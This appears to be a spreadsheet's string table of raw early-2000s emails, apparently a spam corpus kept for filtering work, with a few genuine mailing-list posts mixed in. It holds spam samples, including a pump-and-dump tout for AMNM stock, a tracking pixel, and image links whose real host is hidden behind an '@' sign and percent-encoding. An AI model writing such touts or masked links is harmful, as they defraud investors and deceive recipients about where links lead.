 /font&gt;&lt;/a&gt;&lt;/td&gt;
 							&lt;td align=3D"center"&gt;&lt;a href=3D"http://www.myratedoctor.com/tvdeals=
 /index1.html"&gt;&lt;font color=3D"#000000" face=3D"Verdana, Arial, Helvetica, s=
 ans-serif" size=3D"1"&gt;&lt;img src=3D"http://www.InterstingProducts777.com%40w=
 %77%77%2E%74%65%72%72%61%2Ee%73/p%65r%73%6F%6E%61%6C%39/%35%300%31%308/jui=
 ceIItn.gif" border=3D"0" width=3D"60" height=3D"60"&gt;&lt;br&gt;JUICEMAN II&lt;/font&gt;=
 &lt;/a&gt;&lt;/td&gt;
 							&lt;td align=3D"center"&gt;&lt;a href=3D"http://www.myratedoctor.com/tvdeals=
 /index1.html"&gt;&lt;font color=3D"#000000" face=3D"Verdana, Arial, Helvetica, s=
 ans-serif" size=3D"1"&gt;&lt;img src=3D"http://www.InterstingProducts777.com%40w=
 %77%77%2E%74%65%72%72%61%2Ee%73/p%65r%73%6F%6E%61%6C%39/%35%300%31%308/mir=
 aclebladeT.gif" border=3D"0" width=3D"80" height=3D"40"&gt;&lt;br&gt;MIRACLE BLADE&lt;=
 /font&gt;&lt;/a&gt;&lt;/td&gt;
 							&lt;/tr&gt;&lt;tr&gt;
 							&lt;td align=3D"center"&gt;&lt;a href=3D"http://www.myratedoctor.com/tvdeals=
 /index1.html"&gt;&lt;font color=3D"#000000" face=3D"Verdana, Arial, Helvetica, s=
 ans-serif" size=3D"1"&gt;&lt;img src=3D"http://www.InterstingProducts777.com%40w=
 %77%77%2E%74%65%72%72%61%2Ee%73/p%65r%73%6F%6E%61%6C%39/%35%300%31%308/pha=
 se4tn.gif" border=3D"0" width=3D"60" height=3D"52"&gt;&lt;br&gt;PHASE 4 ORTHOTICS&lt;/=
 font&gt;&lt;/a&gt;&lt;/td&gt;
 							&lt;td align=3D"center"&gt;&lt;a href=3D"http://www.myratedoctor.com/tvdeals=
 /index1.html"&gt;&lt;font color=3D"#000000" face=3D"Verdana, Arial, Helvetica, s=
 ans-serif" size=3D"1"&gt;&lt;img src=3D"http://www.InterstingProducts777.com%40w=
 %77%77%2E%74%65%72%72%61%2Ee%73/p%65r%73%6F%6E%61%6C%39/%35%300%31%308/rol=
 lahoseT.gif" border=3D"0" width=3D"60" height=3D"52"&gt;&lt;br&gt;ROLL-A-HOSE&lt;/font=
 &gt;&lt;/a&gt;&lt;/td&gt;
 							&lt;td align=3D"center"&gt;&lt;a href=3D"http://www.myratedoctor.com/tvdeals=
 /index1.html"&gt;&lt;font color=3D"#000000" face=3D"Verdana, Arial, Helvetica, s=
 ans-serif" size=3D"1"&gt;&lt;img src=3D"http://www.InterstingProducts777.com%40w=
 %77%77%2E%74%65%72%72%61%2Ee%73/p%65r%73%6F%6E%61%6C%39/%35%300%31%308/sha=
 rkblastertn.gif" border=3D"0" width=3D"60" height=3D"62"&gt;&lt;br&gt;SHARK STEAM B=
 LASTER&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 							&lt;/tr&gt;&lt;tr&gt;
 							&lt;td align=3D"center"&gt;&lt;a href=3D"http://www.myratedoctor.com/tvdeals=
 /index1.html"&gt;&lt;font color=3D"#000000" face=3D"Verdana, Arial, Helvetica, s=
 ans-serif" size=3D"1"&gt;&lt;img src=3D"http://www.InterstingProducts777.com%40w=
 %77%77%2E%74%65%72%72%61%2Ee%73/p%65r%73%6F%6E%61%6C%39/%35%300%31%308/sou=
 ndsofthe80stn.gif" border=3D"0" width=3D"60" height=3D"60"&gt;&lt;br&gt;SOUNDS OF T=
 HE 80S BY TIME LIFE&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 							&lt;td align=3D"center"&gt;&lt;a href=3D"http://www.myratedoctor.com/tvdeals=
 /index1.html"&gt;&lt;font color=3D"#000000" face=3D"Verdana, Arial, Helvetica, s=
 ans-serif" size=3D"1"&gt;&lt;img src=3D"http://www.InterstingProducts777.com%40w=
 %77%77%2E%74%65%72%72%61%2Ee%73/p%65r%73%6F%6E%61%6C%39/%35%300%31%308/sti=
 cksharktn.gif" border=3D"0" width=3D"24" height=3D"60"&gt;&lt;br&gt;STICK SHARK&lt;/fo=
 nt&gt;&lt;/a&gt;&lt;/td&gt;
 							&lt;td align=3D"center"&gt;&lt;a href=3D"http://www.myratedoctor.com/tvdeals=
 /index1.html"&gt;&lt;font color=3D"#000000" face=3D"Verdana, Arial, Helvetica, s=
 ans-serif" size=3D"1"&gt;&lt;img src=3D"http://www.InterstingProducts777.com%40w=
 %77%77%2E%74%65%72%72%61%2Ee%73/p%65r%73%6F%6E%61%6C%39/%35%300%31%308/wal=
 kawaythepoundsT.gif" border=3D"0" width=3D"75" height=3D"52"&gt;&lt;br&gt;WALK AWAY=
  THE POUNDS FOR ABS&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 							&lt;/tr&gt;&lt;/table&gt;
 						    &lt;/font&gt;                
 						    &lt;/td&gt;
 						    &lt;/tr&gt;
 						    &lt;/table&gt;
 						    &lt;/td&gt;
 						    &lt;/tr&gt;
 						    &lt;/table&gt;          &lt;/center&gt;
 &lt;/div&gt;
 &lt;p align=3D"center"&gt;&lt;font face=3D"Arial Black" size=3D"3" color=3D"#008000=
 "&gt;Plus
 Thousands of other TV Deals &lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font face=3D"Arial Black" size=3D"3" color=3D"#008000=
 "&gt;Online Now
 --- Fantastic Prices&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font face=3D"Arial Black" size=3D"3" color=3D"#008000=
 "&gt;While
 Supplies Last!&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;font face=3D"Arial Black" size=3D"6" color=3D"#=
 FF0000"&gt;&lt;a href=3D"http://www.myratedoctor.com/tvdeals/index1.html" style=3D=
 "color: #FF0000"&gt;CLICK
 HERE&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font face=3D"Arial"&gt;If you no longer wish to receive =
 our offers and updates &lt;a href=3D"mailto:tvdeals1@excite.com?subject=3Drem=
 ove"&gt; click here&lt;/a&gt;&amp;nbsp;&lt;br&gt;
  and we will promptly honor your request.&lt;/font&gt;&lt;/p&gt;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</si>
  <si>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earthviewer apps Re: whoa
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy cynicizes:
 &gt; Hmmm, just as I thought.  In other words, it has no practical uses
 &gt; whatsoever ;) 
 Tourism is the world's largest industry. Using this
 to preview your travels, or figure out where you are,
 would be very valuable.
 Online gaming continues to grow. Screw "Britannia", 
 real-life Britain would be a fun world to wander/
 conquer/explore virtually, in role-playing or real-
 time-strategy games.
 And of course, as James Rogers points out, it's an
 ideal display substrate for all sorts of other 
 overlaid data. Maps are great, photrealistic 3-D
 maps of everywhere which can have many other static 
 and dynamic datasets overlaid are spectacular. 
 (Combining those last two thoughts: consider the
 static world map, in faded colors, with patches
 here-and-there covered by live webcams, stitched
 over the static info in bright colors... it'd be
 like the "fog of war" view in games like Warcraft,
 over the real world.)
 - Gordon
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Online credit repair.Do it yourself.                 19186
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;webCREDIT&lt;/TITLE&gt;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OUND=3Dhttp://213.139.76.162/creditfix/email/background_arrow.gif WIDTH=3D=
 400&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;A HREF=3Dhttp://213.139.76.162/creditfix/?CID=3D1320&amp;MID=3D15000&gt;&lt;IMG=
  SRC=3Dhttp://213.139.76.162/creditfix/email/banner_email.gif BORDER=3D0&gt;&lt;=
 /A&gt;&lt;BR&gt;
 &lt;IMG SRC=3Dhttp://213.139.76.162/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;A HREF=3Dhttp://213.139.76.162/creditfix/?CID=3D1320&amp;MID=3D15000&gt;&lt;img src=
 =3Dhttp://213.139.76.162/creditfix/email/body_email.gif alt=3D"" border=3D=
 "0"&gt;&lt;/A&gt;
 &lt;BR&gt;
 &lt;FONT FACE=3DVerdana SIZE=3D2&gt;Thank You,&lt;/FONT&gt;&lt;BR&gt;
 &lt;IMG SRC=3Dhttp://213.139.76.162/creditfix/email/thankyou.gif&gt;
 &lt;BR&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;IMG SRC=3Dhttp://213.139.76.162/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;br&gt;
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;Your email address was obtained from a purch=
 ased 
 list, Reference # 1320-15000.&amp;nbsp;&amp;nbsp;If you wish to unsubscribe from t=
 his list, please
 &lt;a href=3D"http://61.172.250.143/remove/remove1.html"&gt;Click here&lt;/a&gt; and e=
 nter your
 name into the remove box. If you have previously
 unsubscribed and are still receiving this message, you may email our
 &lt;a href=3D"mailto:solutions@runsaa.com?Subject=3DAbuse Report"&gt;Abuse Contr=
 ol Center&lt;/a&gt;,
 or call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way,
 Miami, FL, 33155".&lt;/FONT&gt;&lt;br&gt;
 &lt;BR&gt;
 &lt;IMG SRC=3Dhttp://213.139.76.162/creditfix/email/line.gif&gt;&lt;BR&gt;
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;&amp;copy; 2002 Web Credit Inc. All Rights Reser=
 ved&lt;/FONT&gt;&lt;FONT FACE=3D"Verdana" SIZE=3D"1"&gt;.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/CENTER&gt;
 &lt;BR&gt;
 &lt;/BODY&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Amnis Systems, Inc. (OTCBB:AMNM)
 CONTRACT ANNOUNCEMENTS AND HUGE NEWSLETTER COVERAGE THIS WEEK FOR AMNM !!!
 This Thursday AMNM will be profiled by some major newsletters.  There will be huge volume and a strong 
 increase in price for several days.  These are the same newsletters that profiled CLKS two weeks ago.  
 They brought CLKS from $1.50 to $4.35 in ten days.  We know for certain that the same groups are going 
 to profile AMNM starting on Thursday.
 We are very proud that we can share this information with you so that you can make a profit out of it.  
 It is highly advisable to take a position in AMNM as soon as possible, today before the market closes,  
 or tomorrow.
 The stock is trading near its 52 week low, and will start moving up immediately.  We believe the stock 
 could easiely reach $4 in less than a month.
 Good luck and watch AMNM fly this week!!
</t>
  </si>
  <si>
    <t xml:space="preserve">Lance (lance_tt@bellsouth.net) wrote*:
 &gt;
 &gt;well, from the looks of things, Evolution mail client isn't supported
 &gt;just yet, so I reckon I'll wait a bit.  Whoever posted these gnome2 apt
 &gt;repositories, thanks!!!
 &gt;
 I'm uising Havoc Pennington's Gnomehide and it rocks. I installed it before I
 knew about apt, but one of the previous emails had an apt repository that
 claimed to have gnomehide. Just remember there is one kew file that makes the
 difference between Gnome1 and Gnome2 being used. I *think* it is "gnome-core"
 vs. "gnome-session" but I can not remember.
 Note that that those same files are probably in the Limbo beta, except
 updated. There has not been a major change to "gnomehide" in a while, I
 suspect Havoc's work went into Limbo then.
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bugbear email steals card data
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8597657,215/
 Date: 2002-10-06T02:27:58+01:00
 *Net news:* A devastating new computer virus is causing havoc around the world 
 as it crashes computers, distributes confidential e-mails and steals credit 
 card details.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lowest Rates Available.                    gjannsxrwg
</t>
  </si>
  <si>
    <t xml:space="preserve">When America's top companies compete for your business, you win.
 http://four87.six86.com/sure_quote/sure_quote.htm
 Take a moment to let us show you that we are here to save you money and address your concerns
 with absolutely no hassle, no obligation, no cost quotes, on all your needs, from America's
 top companies.
 -Life Insurance 70% off.
 -Medical Insurance 60% off.
 -Mortgage rates that save you thousands.
 -New home loans.
 -Refinance or consolidate high interest credit card debt into a low interest mortgage.
 -Get the best prices from the nation's leading health insurance companies.
 _Dental Insurance at the lowest rate available.
 We will soon be offering  Auto Insurance quotes as well.
 http://four87.six86.com/sure_quote/sure_quote.htm
 "...was able to get 3 great offers in
 less than 24 hours." -Jennifer C
 "Met all my needs... being able to search
 for loans in a way that puts me in control." -Robert T.
 "..it was easy, effortless...!"-Susan A.
 Click here to delete your address from future updates.
 http://four87.six86.com/sure_quote/sure_quote/rm/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</si>
  <si>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taint.org
</t>
  </si>
  <si>
    <t xml:space="preserve">--374035298.1030784379296.JavaMail.SYSTEM.emaserver2
 Content-Type: text/plain; charset=utf-8
 Content-Transfer-Encoding: 7bit
 Hi
 I visited taint.org, and noticed that you're not listed on some search engines! I think we can
 offer you a service which can help you increase traffic and the number of visitors to your website.
 I would like to introduce you to TrafficMagnet.com. We offer a unique technology that will submit your 
 website to over 300,000 search engines and directories every month.
 You'll be surprised by the low cost, and by how effective this website promotion method can be. 
 To find out more about TrafficMagnet and the cost for submitting your website to over 300,000 search 
 engines and directories, visit us at:
 http://emaserver.trafficmagnet.net/trafficmagnet/www/r?1000023044.484.23.+bpOq88R31Z$Ff
 I would love to hear from you. 
 Best Regards,
 Sarah Williams
 Sales and Marketing 
 E-mail: Sarah_Williams@trafficmagnet.com
 http://www.TrafficMagnet.com
 This email was sent to zzzz-latestdodgydotcomstock@jmason.org. 
 I understand that you may NOT wish to receive information from me by email. 
 To be removed from this and other offers, simply go to the link below:
 http://emaserver.trafficmagnet.net/trafficmagnet/www/optoutredirect?UC=Lead&amp;UI=11028981
 --374035298.1030784379296.JavaMail.SYSTEM.emaserver2
 Content-Type: text/html; charset=utf-8
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;!-- 1.0 --&gt; 
 &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;STYLE TYPE="text/css"&gt;
 &lt;!--
 TD { font-family: verdana, arial, helvetica; font-size: 11px; color: #000000 }
 --&gt;
 &lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR="#FFFFFF"&gt;
 &lt;TABLE WIDTH="600" BORDER="0" CELLSPACING="0" CELLPADDING="0"&gt;
 &lt;TR&gt;
 	&lt;TD&gt;Hi&lt;BR&gt;
 	&lt;BR&gt;
 	I visited &lt;A HREF="http://emaserver.trafficmagnet.net/trafficmagnet/www/r?1000023044.484.5.xzkMwMLDSukz4w"&gt;taint.org&lt;/A&gt;, and 
 	noticed that you're not listed on some search engines! I think we can offer 
 	you a service which can help you increase traffic and the number of visitors 
 	to your website.&lt;BR&gt;
 	&lt;BR&gt;
 	I would like to introduce you to &lt;A HREF="http://emaserver.trafficmagnet.net/trafficmagnet/www/r?1000023044.484.2.iXFFahQO9Pcvg0"&gt;TrafficMagnet.com&lt;/A&gt;. We offer a unique technology 
 	that will submit your website to over 300,000 search engines and directories 
 	every month.&lt;BR&gt;
 	&lt;BR&gt; 
 	&lt;TABLE WIDTH="398" BORDER="0" CELLSPACING="0" CELLPADDING="0" ALIGN="center"&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;&lt;A HREF="http://emaserver.trafficmagnet.net/trafficmagnet/www/r?1000023044.484.8.F3cr+uFpaCjOlP"&gt;&lt;IMG SRC="http://www.trafficmagnet.com/img/img_tm.gif" WIDTH="137" HEIGHT="136" BORDER="0"&gt;&lt;/A&gt;&amp;nbsp;&lt;/TD&gt;
 		&lt;TD&gt;&lt;A HREF="http://emaserver.trafficmagnet.net/trafficmagnet/www/r?1000023044.484.11.9sldkElv7vJbZk"&gt;&lt;IMG SRC="http://www.trafficmagnet.com/img/img_website.gif" WIDTH="197" HEIGHT="141" BORDER="1"&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD VALIGN="bottom"&gt;&lt;A HREF="http://emaserver.trafficmagnet.net/trafficmagnet/www/r?1000023044.484.14.2CpR2KKEBosvJg"&gt;&lt;IMG SRC="http://www.trafficmagnet.com/img/img_signup.gif" WIDTH="62" HEIGHT="136" BORDER="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;/TABLE&gt;
 	&lt;BR&gt;
 	You'll be surprised by the low cost, and by how effective this website promotion 
 	method can be. &lt;BR&gt;
 	&lt;BR&gt;
 	To find out more about TrafficMagnet and the cost for submitting your website 
 	to over 300,000 search engines and directories, visit &lt;A HREF="http://emaserver.trafficmagnet.net/trafficmagnet/www/r?1000023044.484.17.YGNJEiIB8EjCDj"&gt;www.TrafficMagnet.com&lt;/A&gt;. 
 	&lt;BR&gt;
 	&lt;BR&gt;
 	I would love to hear from you. &lt;BR&gt;
 	&lt;BR&gt;&lt;BR&gt;
 	Best Regards,&lt;BR&gt;&lt;BR&gt;
 	Sarah Williams&lt;BR&gt;
 	Sales and Marketing&lt;BR&gt;
 	E-mail: Sarah_Williams@trafficmagnet.com&lt;BR&gt;
 	&lt;A HREF="http://emaserver.trafficmagnet.net/trafficmagnet/www/r?1000023044.484.20.cVaDkQg$4xPbfF"&gt;http://www.TrafficMagnet.com&lt;/A&gt; 
 	&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 	&lt;TD&gt;&lt;FONT COLOR="#999999"&gt;This email was sent to zzzz-latestdodgydotcomstock@jmason.org.&lt;BR&gt;
 	I understand that you may NOT wish to receive information from me by email.&lt;BR&gt;
 	To be removed from this and other offers, simply &lt;A HREF="http://emaserver.trafficmagnet.net/trafficmagnet/www/optoutredirect?UC=Lead&amp;UI=11028981"&gt;click here&lt;/A&gt;.&lt;BR&gt;&lt;/FONT&gt;
 	&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;IMG SRC="http://emaserver.trafficmagnet.net/trafficmagnet/www/picture.jsp?UC=Lead&amp;UI=11028981&amp;CRID=484CR1000023044" ALT="." HEIGHT=1 WIDTH=1&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 --374035298.1030784379296.JavaMail.SYSTEM.emaserver2--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: []ǰ&amp;ǰȭǰ
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;top&lt;/TITLE&gt;
 &lt;META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; charset=3Deuc-kr"=
 &gt;
 &lt;style type=3D"text/css"&gt;
 body
 {scrollbar-face-color: #FFFFFF;
 scrollbar-highlight-color: #aaaaaa;
 scrollbar-3dlight-color: #FFFFFF;
 scrollbar-shadow-color: #aaaaaa;
 scrollbar-darkshadow-color: #FFFFFF;
 scrollbar-track-color: #FFFFFF;
 scrollbar-arrow-color: #aaaaaa;
 &lt;/style&gt;
 &lt;style type=3D"text/css"&gt;
 A{COLOR:#000000; text-decoration:none}
 A:link {COLOR:#000000; text-decoration:none}
 A:active {COLOR:#000000; text-decoration:none}
 A:visited {COLOR:#000000;text-decoration:none}
 A:hover   { background:#FFFFFF; color:#000000; text-decoration:none; }
 b{COLOR:#071945;font-weight:bold}
 td { font-size: 9pt;line-height:11pt }
 .copyright{font-size:10pt;color:#393939;}
 .ment{font-size:9pt;color:#191970}
 &lt;/style&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=3D#FFFFFF background=3D"http://sh8.soho.yahoo.co.kr/co_img4=
 /godsmell/top_bg.gif" leftmargin=3D"0" topmargin=3D"0"&gt;
 &lt;TABLE WIDTH=3D770 BORDER=3D0 CELLPADDING=3D0 CELLSPACING=3D0&gt;
 &lt;TR&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;a href=3D"http://www.godsmell.co.kr" target=3D"_blank" &gt;&lt;IMG SRC=3D"http=
 ://sh8.soho.yahoo.co.kr/co_img4/godsmell/top_13.gif" WIDTH=3D160 HEIGHT=3D=
 139 border=3D"0"&gt;&lt;/TD&gt;&lt;/a&gt;
 &lt;TD COLSPAN=3D3&gt;
 &lt;a href=3D"http://www.godsmell.co.kr" target=3D"_blank" &gt;&lt;IMG SRC=3D"http=
 ://sh8.soho.yahoo.co.kr/co_img7/godsmell/top_14.gif" WIDTH=3D211 HEIGHT=3D=
 139 border=3D"0"&gt;&lt;/TD&gt;&lt;/a&gt;
 &lt;TD COLSPAN=3D3&gt;
 &lt;a href=3D"http://www.godsmell.co.kr" target=3D"_blank" &gt;&lt;IMG SRC=3D"http=
 ://sh8.soho.yahoo.co.kr/co_img7/godsmell/top_15.gif" WIDTH=3D230 HEIGHT=3D=
 139 border=3D"0"&gt;&lt;/TD&gt;&lt;/a&gt;
 &lt;TD COLSPAN=3D3&gt;        &lt;a href=3D"http://www.godsmell.co.kr" target=3D"_=
 blank" &gt;&lt;IMG SRC=3D"http://sh8.soho.yahoo.co.kr/co_img7/godsmell/top_16.g=
 if" WIDTH=3D169 HEIGHT=3D139 usemap=3D"#Map" border=3D"0"&gt;&lt;/TD&gt;&lt;/a&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;map name=3D"Map"&gt;
 &lt;area shape=3D"rect" coords=3D"4,113,164,135" href=3D"http://www.godsmell=
 .co.kr" target=3D"_blank"&gt;
 &lt;/map&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
 &lt;font size=3D2&gt;&lt;b&gt;=BE=C8=B3=E7=C7=CF=BC=BC=BF=E4.&lt;br&gt;
 =C0=FA=C8=F1 GodSmell=C0=BA =B8=ED=C7=B0=C7=E2=BC=F6=B8=A6 =C0=FC=B9=AE=C0=
 =FB=C0=B8=B7=CE =C6=C7=B8=C5=C7=CF=B4=C2 =C7=E2=BC=F6 =C0=FC=B9=AE =BC=EE=
 =C7=CE=B8=F4=C0=D4=B4=CF=B4=D9.&lt;br&gt;
 =B9=E9=C8=AD=C1=A1 =B0=A1=B0=DD=B0=FA =BA=F1=B1=B3=C7=D8=BA=B8=BC=BC=BF=E4=
 !&lt;br&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;!-------------=C0=CE=BB=E7=B8=BB----------------&gt;
 &lt;table border=3D0 cellpadding=3D0 cellspacing=3D0 width=3D420&gt;
 &lt;tr&gt;
 &lt;td width=3D143&gt;&lt;img src=3D"http://www.godsmell.co.kr/images/12/maintitle=
 1.gif" border=3D0 alt=3D"=C3=DF=C3=B5=BB=F3=C7=B0=C0=D4=B4=CF=B4=D9"&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;!-------------=C3=DF=C3=B5 =BB=F3=C7=B0 =B8=AE=BD=BA=C6=AE--------------=
 --&gt;
 &lt;table border=3D0 cellpadding=3D0 cellspacing=3D0&gt;
 &lt;tr&gt;&lt;td class=3D"line" height=3D6&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align=3Dcenter class=3Dlims width=3D105 valign=3Dtop&gt;
 &lt;table border=3D0 cellpadding=3D0 cellspacing=3D0 width=3D100 height=3D80=
 &gt;&lt;tr&gt;&lt;td align=3Dcenter height=3D100&gt;
 &lt;a href=3D"http://www.godsmell.co.kr" target=3D"_blank" &gt;
 &lt;img src=3D"http://www.godsmell.co.kr/shopimages/godsmell/0030280000043.j=
 pg" border=3D0  width=3D100 &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr height=3D30 class=3Dwoong&gt;=
 &lt;td valign=3Dtop align=3Dcenter&gt;
 &lt;a href=3D"/shop/shopdetail.html?brandcode=3D003028000004" onMouseOver=3D=
 "window.status=3D'=BB=F3=BC=BC=C1=B6=C8=B8';return true; "&gt;
 =B1=D7=B8=B0=C6=BC 50ml&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr height=3D10 class=3Dwoong&gt;&lt;td valign=3Dtop align=3Dcenter&gt;24,000=BF=F8=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src=3D"http://www.godsmell.co.kr/shopimages/godsmell/0030310000053.g=
 if" border=3D0  height=3D100 &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr height=3D30 class=3Dwoong=
 &gt;&lt;td valign=3Dtop align=3Dcenter&gt;
 &lt;a href=3D"/shop/shopdetail.html?brandcode=3D003031000005" onMouseOver=3D=
 "window.status=3D'=BB=F3=BC=BC=C1=B6=C8=B8';return true; "&gt;
 =BC=F6=C0=CC=B7=AF=BA=EA 30ml&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr height=3D10 class=3Dwoong&gt;&lt;td valign=3Dtop align=3Dcenter&gt;32,000=BF=F8=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src=3D"http://www.godsmell.co.kr/shopimages/godsmell/0140020000163.j=
 pg" border=3D0  width=3D100 &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr height=3D30 class=3Dwoong&gt;=
 &lt;td valign=3Dtop align=3Dcenter&gt;
 &lt;a href=3D"/shop/shopdetail.html?brandcode=3D014002000016" onMouseOver=3D=
 "window.status=3D'=BB=F3=BC=BC=C1=B6=C8=B8';return true; "&gt;
 =B0=D6=B6=FB =C5=F5=C0=A9=C4=C9&amp;#51084&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr height=3D10 class=3Dwoong&gt;&lt;td valign=3Dtop align=3Dcenter&gt;48,000=BF=F8=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src=3D"http://www.godsmell.co.kr/shopimages/godsmell/0090020000183.j=
 pg" border=3D0  height=3D100 &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr height=3D30 class=3Dwoong=
 &gt;&lt;td valign=3Dtop align=3Dcenter&gt;
 &lt;a href=3D"/shop/shopdetail.html?brandcode=3D009002000018" onMouseOver=3D=
 "window.status=3D'=BB=F3=BC=BC=C1=B6=C8=B8';return true; "&gt;
 =B6=FB=C4=DE =B9=CC=B6=F3=C5=AC 7ml&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr height=3D10 class=3Dwoong&gt;&lt;td valign=3Dtop align=3Dcenter&gt;10,000=BF=F8=
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3D7 class=3D'line' height=3D5&gt;&amp;nbsp;&lt;/td&gt;&lt;tr&gt;
 &lt;td align=3Dcenter class=3Dlims width=3D105 valign=3Dtop&gt;
 &lt;table border=3D0 cellpadding=3D0 cellspacing=3D0 width=3D100 height=3D80=
 &gt;&lt;tr&gt;&lt;td align=3Dcenter height=3D100&gt;
 &lt;a href=3D"http://www.godsmell.co.kr" target=3D"_blank" &gt;
 &lt;img src=3D"http://www.godsmell.co.kr/shopimages/godsmell/0030010000033.j=
 pg" border=3D0  height=3D100 &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr height=3D30 class=3Dwoong=
 &gt;&lt;td valign=3Dtop align=3Dcenter&gt;
 &lt;a href=3D"/shop/shopdetail.html?brandcode=3D003001000003" onMouseOver=3D=
 "window.status=3D'=BB=F3=BC=BC=C1=B6=C8=B8';return true; "&gt;
 =B8=A3=BA=FC =B0=D5=C1=B6 30ml&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr height=3D10 class=3Dwoong&gt;&lt;td valign=3Dtop align=3Dcenter&gt;22,000=BF=F8=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src=3D"http://www.godsmell.co.kr/shopimages/godsmell/0090040000103.j=
 pg" border=3D0  width=3D100 &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr height=3D30 class=3Dwoong&gt;=
 &lt;td valign=3Dtop align=3Dcenter&gt;
 &lt;a href=3D"/shop/shopdetail.html?brandcode=3D009004000010" onMouseOver=3D=
 "window.status=3D'=BB=F3=BC=BC=C1=B6=C8=B8';return true; "&gt;
 =C7=C3=B6=F3=BF=F6 =B9=D9=C0=CC =B0=D5=C1=B6 4ml&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr height=3D10 class=3Dwoong&gt;&lt;td valign=3Dtop align=3Dcenter&gt;10,000=BF=F8=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src=3D"http://www.godsmell.co.kr/shopimages/godsmell/0030120000053.j=
 pg" border=3D0  height=3D100 &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr height=3D30 class=3Dwoong=
 &gt;&lt;td valign=3Dtop align=3Dcenter&gt;
 &lt;a href=3D"/shop/shopdetail.html?brandcode=3D003012000005" onMouseOver=3D=
 "window.status=3D'=BB=F3=BC=BC=C1=B6=C8=B8';return true; "&gt;
 =B9=CC=B6=F3=C5=AC 30ml&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
